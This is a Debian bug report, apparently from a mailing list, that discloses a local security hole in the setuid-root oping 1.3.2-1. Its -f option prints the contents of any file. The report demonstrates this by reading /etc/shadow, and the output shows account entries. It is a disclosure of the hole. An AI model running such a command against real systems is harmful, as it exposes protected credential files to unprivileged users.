Package: oping Version: 1.3.2-1 Justification: user security hole Severity: grave Tags: security
*** Please type your report below this line *** oping is setuid root and one of the command line arguments allows a configuration file to be specified. This file is read and *reported* to the console. (Unless the file contains contents which can be interpreted as a list of hostnames!) For example: s...@gold:~$ oping -f /etc/shadow Adding host `root:$1eluded/value:14368:0:99999:7:::' failed: getaddrinfo: Name or service not known Adding host `daemon:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known Adding host `bin:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known Adding host `sys:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known Adding host `sync:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known Adding host `games:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known This is clearly a security hole - however the good news is that the version(s) of oping included in lenny and etch are unaffected. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages oping depends on: ii libc6 2.9-26 GNU C Library: Shared libraries ii liboping0 1.3.2-1 C/C++ library to generate ICMP ECH oping recommends no packages. oping suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
